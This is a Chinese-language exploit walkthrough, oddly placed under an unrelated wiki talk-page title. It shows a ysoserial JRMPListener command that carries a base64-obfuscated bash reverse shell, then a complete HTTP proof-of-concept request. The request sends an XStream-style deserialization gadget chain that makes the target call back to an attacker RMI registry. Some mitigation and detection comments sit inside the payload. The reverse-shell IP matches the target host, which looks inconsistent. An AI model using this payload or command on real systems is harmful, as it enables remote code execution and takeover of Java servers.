Talk:Mw-mainpage-url


攻击机启动一个恶意的 RMI Registry:

java -cp ysoserial-master.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIwLjEyOS8yMzMzMyAwPiYx}|{base64,-d}|{bash,-i}"

工具下载链接: https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar

然后对目标机器发送 PoC:

POST / HTTP/1.1
Host: 192.168.20.129:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Connection: close
Content-Type: application/xml
Content-Length: 3117

<java.util.PriorityQueue serialization='custom'>
   <unserializable-parents/>

   <!-- Request body: a serialized java.util.PriorityQueue holding two javax.naming.ldap.Rdn_-RdnEntry
        elements. NOTE(review): the serialization='custom' / class='...' layout looks like XStream's
        XML format; confirm which parser the receiving endpoint uses.
        Mitigation: restrict the unmarshaller to an explicit allowlist of application types so that
        the JDK-internal classes named below (com.sun.*, sun.rmi.*, javax.naming.*) are rejected
        before instantiation. If the parser is XStream, its type-permission API (allowTypes,
        allowTypesByWildcard) is the place to do this; confirm against the deployed version. -->
   <java.util.PriorityQueue>
       <default>
           <size>2</size>
       </default>
       <int>3</int>
       <!-- First entry: its value is an XString wrapping a literal string. -->
       <javax.naming.ldap.Rdn_-RdnEntry>
           <type>12345</type>
           <value class='com.sun.org.apache.xpath.internal.objects.XString'>
               <m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content</m__obj>
           </value>
       </javax.naming.ldap.Rdn_-RdnEntry>
       <!-- Second entry: its value is a com.sun.xml.internal.ws.api.message.Packet; everything
            below is nested inside that Packet's message field. -->
       <javax.naming.ldap.Rdn_-RdnEntry>
           <type>12345</type>
           <value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>
               <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>
                   <parsedMessage>true</parsedMessage>
                   <soapVersion>SOAP_11</soapVersion>
                   <bodyParts/>
                   <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
                       <attachmentsInitialized>false</attachmentsInitialized>
                       <!-- Detection: none of these JDK-internal class names belongs in a request body.
                            Matching on them (KeyStoreResolver$KeyStoreIterator, LazySearchEnumerationImpl,
                            BindingEnumeration, RegistryImpl_Stub) in application/xml traffic is a
                            usable signature for this payload. -->
                       <nullIter class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>
                           <aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'>
                               <candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'>
                                   <names>
                                       <string>aa</string>
                                       <string>aa</string>
                                   </names>
                                   <ctx>
                                       <environment/>
                                       <!-- RMI registry stub: the reference and the ctx host/port below both
                                            name 192.168.20.128:1099, the port the page's listener command
                                            uses. Detection: an application server opening an outbound
                                            connection to an unfamiliar host on an RMI port shortly after
                                            receiving such a request. Egress filtering from the application
                                            tier limits the impact even if the parser accepts the body. -->
                                       <registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'>
                                           <java.rmi.server.RemoteObject>
                                               <string>UnicastRef</string>
                                               <string>192.168.20.128</string>
                                               <int>1099</int>
                                               <long>0</long>
                                               <int>0</int>
                                               <long>0</long>
                                               <short>0</short>
                                               <boolean>false</boolean>
                                           </java.rmi.server.RemoteObject>
                                       </registry>
                                       <host>192.168.20.128</host>
                                       <port>1099</port>
                                   </ctx>
                               </candidates>
                           </aliases>
                       </nullIter>
                   </sm>
               </message>
           </value>
       </javax.naming.ldap.Rdn_-RdnEntry>
   </java.util.PriorityQueue>

</java.util.PriorityQueue>